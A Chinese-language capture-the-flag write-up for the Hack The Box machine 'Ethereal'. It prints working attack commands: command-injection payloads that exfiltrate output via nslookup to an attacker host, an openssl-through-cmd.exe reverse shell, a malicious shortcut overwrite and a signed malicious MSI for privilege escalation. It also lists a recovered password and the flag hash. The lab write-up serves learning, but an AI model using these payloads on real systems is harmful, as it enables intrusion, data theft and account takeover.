Hack The Box Ethereal WriteUp

首先这题真的很难，要有充分的思想准备和无数次的模拟环境搭建
1.利用匿名账户Anonymous登录，可以发现FDISK.zip压缩文件，下载前将传输模式切换到binary，否者经常因为网络因素导致下载失败

Ftp服务器
2.解压FDISK.zip，可以拿到一个镜像文件。利用file命令识别后，发现这是一个FAT格式的磁盘。利用mount -t vfat /root/FDISK /mnt/htbdisk挂载磁盘，从中取出pbox.dat和pbox.exe两个文件。安装好xp虚拟机并双击运行pbox.exe发现这是一个16位应用程序，并不能直接运行。 pbox.exe
3.16位程序模拟器很好找，DosBox是目前最有名的一款，很多当年的街机游戏都可以运行，像是波斯王子、坦克大战啊，这些我都还没通关...进入pbox首先还是挂载mount c c:\pbox，将此c:\pbox文件夹挂载为pbox的c盘，这样就可以在pbox中看到pbox.exe。但是直接运行还是会报错如下： pbox运行报错
4.这可能是版本兼容的问题，好在kali环境下也能安装DosBox（apt-get install dosbox），但因为Dos保护模式的原因，可能会报一个类似< no DPMI - Get csdpmi*b.zip > 的错误。解决方式可以参考：https://www.linuxtopia.org/online_books/linux_tool_guides/the_sed_faq/sedfaq5_004.html 解决问题的核心关键就是下载CWSDPMI.EXE然后扔到pbox.exe目录下，就可以正常运行pbox.exe了。 pbox正常运行
5.输入的密码是password，进去之后是一个数据库，点击相应的表项就能看到相关内容，从中可以导出一堆的用户名密码，其中有效的组合是：
user: alan
password: !C414m17y57r1k3s4g41n! pbox数据库
6.获取的用户名密码可以用于登录8080端口，这是一个Test Connection页面，根据Ping Address提示，不难想到这是一个命令注入漏洞。 8080端口登录
7.需要解决的问题是如何查看回显，在linux环境中常用的是ping -p 外带，但是windows的ping命令并没有-p选项，因此唯一能用的是nslookup命令，结合tokens参数筛选需要的命令结果，同时需要利用cmd脚本的for循环来反馈结果，例如我需要看netstat -ano结果的第二行，即所有ip和端口结果，在web中输入的命令为：
127.0.0.1 | for /f "tokens=2" %I in ('netstat -ano') do nslookup %I 10.10.8.8
有关for /f的脚本循环体介绍可以看https://www.youtube.com/watch?v=jMS6LkMdAHI
需要注意的是tokens参数能够级联，比如我想看结果的1至6行，只需要添加tokens=1,2,3,4,5,6和相应占位符%a.%b.%c.%d.%e.%f即可如：
127.0.0.1 | for /f "tokens=1,2,3,4,5,6" %a in ('type c:\xxxxx.txt') do nslookup %a.%b.%c.%d.%e.%f 10.10.8.8
在web端执行命令注入后，启动tcpdump或者wireshark都是可以的，过滤dns即可看到命令回显：（下图运行的是tasklist，因为nslookup在失败时会执行2次查询，所以结果会有重复） wireshark抓包结果
8.枚举防火墙规则，netsh advfirewall firewall show rule name=all是查看windows防火墙规则的命令，但在该RCE环境中无法正常执行，因此需要找到一处可写路径，将结果转储成文件，再用type方法将内容取回。通常c:\users\public目录是权限最低的路径，但是直接写入是失败的，尝试利用icacls命令对目录权限进行枚举，最终发现当前用户alan可以写入C:\users\public\desktop\shortcuts\，最终读取防火墙配置：仅允许TCP 73和136端口通信。
枚举权限：
127.0.0.1 & for /f "tokens=1,2,3," %a in ('icacls c:\users\public\Desktop*. /findsid alan /t /c /l') do nslookup %a.%b.%c 10.10.8.8

9.继续搜索系统中的蛛丝马迹，利用dir检索C盘，最后在C:\Program Files (x86)目录下发现安装有Openssl-v1.1.0版本，我们将利用它实现shell。
能显示较完整dir结果的命令：
127.0.0.1 & for /f "tokens=1,2,3," %a in ('dir /B "C:\users\public\Desktop\Shortcuts"') do nslookup %a.%b.%c 10.10.8.8

10.openssl的CS工作模式对于我来说并不熟悉，因此首先在本地构建模拟环境，官网https://www.openssl.org可以查阅命令参数，和下载源码，但没有安装包。各版本的安装包可以通过http://slproweb.com/products/Win32OpenSSL.html下载。安装过程就是一路next不再赘述。

openssl for windows
11.在kali端首先搭建openssl server你需要一个私钥和一本证书，因此运行命令：
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
随后有一些证书信息需要填写，随意就行，格式对就没问题，例如电子邮件，国家简写
对命令参数有疑问的可以参考IBM文档：
https://www.ibm.com/support/knowledgecenter/en/SSWHYP_4.0.0/com.ibm.apimgmt.cmc.doc/task_apionprem_gernerate_self_signed_openSSL.html 生成证书
12.利用openssl的s_client连接服务器，在模拟环境中测试发现，openssl的工作有些像没有-e选项的nc，你输入什么，对方就显示什么，并不能执行命令。由此可以想到利用管道符重定向输入和输出，也就是将一个openssl的连接通过管道符“|”重定向给cmd.exe，再用一个管道符“|”将运行结果重定向给openssl的另一个连接。简而言之就是：
openssl s_client 1 ---->input | cmd.exe | openssl s_client 2 ---->output
这也是为什么防火墙规则要放行两个端口的原因。
转化为web端的RCE命令即：
10.10.8.8 | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73 | cmd.exe | C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:136（RCE命令）
注意在实际攻击目标时，我们要同时开两个终端，一个openssl server 73和另一个openssl server 136，服务端监听命令：
openssl s_server -quiet -key key.pem -cert cert.pem -port 73
openssl s_server -quiet -key key.pem -cert cert.pem -port 136
我在73端口的终端里输入命令并回车，然后在web端提交上述RCE命令将输入压入管道，在136端口的终端里查看结果 获取shell
13.在获取一个低权限的shell以后，我们能在c:\users\alan\Desktop路径下拿到下一步的线索。他告诉我们，在Public Desktop路径中存在一个VS的快捷方式，让我们利用它。 线索文件
14.LNKUp是利用windows快捷方式执行命令的恶意快捷方式生成器。项目地址：https://github.com/Plazmaz/LNKUp
命令格式：
python generate.py --host localhost --type ntlm --output out.lnk --execute
"C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73|cmd.exe|C:\Progra~2\OpenSSLv1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:136"
生成后的恶意快捷方式如下，你可以看到需要执行的命令在快捷方式目标栏处。 恶意快捷方式
15.上传恶意快捷方式，并覆盖c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk。需要注意直接上传.lnk文件可能失败，可以重命名为.txt后缀上传。上传过程同样利用管道，但必须先断开原始连接。
kali 运行：openssl s_server -quiet -key key.pem -cert cert.pem -port 73 < 恶意.txt
web运行：10.10.8.8|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.8.8:73 > c:\users\public\desktop\shortcuts\out.txt（注意上传成功后改回后缀）
重新建立shell连接
shell运行：del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy "c:\users\public\desktop\shortcuts\out.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" LNKUp
16.很快能够获得一个新的shell，在这个shell中，不需要依赖web，可以直接在73输入，在136中查看结果，操作顺畅不少，在jorge用户桌面拿下user.txt user.txt
17.继续搜索可以发现，D盘存在两个可疑文件夹，一个是Certs，里面保存有证书文件，另一个是DEV文件夹，里面保存了另一条线索文件。这条线索很好理解，只要生成一个恶意msi安装包放到这个路径下，Rupal用户就会来点，结合证书文件，这很可能是要生成一个签名后的msi 线索文件2
18.直接type证书文件会得到乱码，无法拷贝。目前我们也没有下载渠道，因此想到利用openssl的base64编码功能，将内容打印出来，命令如下：
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.cer
C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in MyCA.pvk
将base64编码后的文本拷贝到kali，并利用base64 -d解码还原。 获取证书
19.生成msi，我们利用EMCO MSI Package Builder的图形化界面来操作。先新建工程，然后点击Custom Actions，在右侧Pre & Post Actions中右键新建动作，填写关键参数后就可以Create MSI Package了。（密码留空） 恶意msi生成
20.利用下载的证书对msi进行签名。这需要用到 .NET Framework 4 和winsdk，它们可以在以下地址下载：
.NET Framework 4 ：https://www.microsoft.com/en-us/download/details.aspx?id=17851
winsdk：https://www.microsoft.com/en-us/download/confirmation.aspx?id=8279
安装好后，就可以开始签名了，命令依次如下：
makecert -n "CN=Ethereal" -pe -cy end -ic C:\MyCA.cer -iv C:\MyCA.pvk -sky signature -sv C:\hack.pvk C:\hack.cer
pvk2pfx -pvk C:\hack.pvk -spc C:\hack.cer -pfx C:\hack.pfx
signtool sign /f C:\hack.pfx C:\shell.msi
如果签名成功，可以看到如下提示：
签名成功
21.将签名后的msi上传至d:\dev\msis\shell.msi，然后退出73和136的两个openssl连接，重新监听它们，大约1分钟的时间，rupal用户的shell就会上线，可以在他的Desktop路径下读取root.txt 1cb6f1fc220e3f2fcc0e3cd8e2d9906f
22.若一次部署msi没有成功，需要尝试第二次，必须重新生成一个msi并签名上传，因为安装过了的msi在系统中已经注册，不会再运行一次了，你可以从控制面板的添加删除程序中看到它们，但现在在这个环境里我们没有办法卸载之前安装的msi。 添加删除程序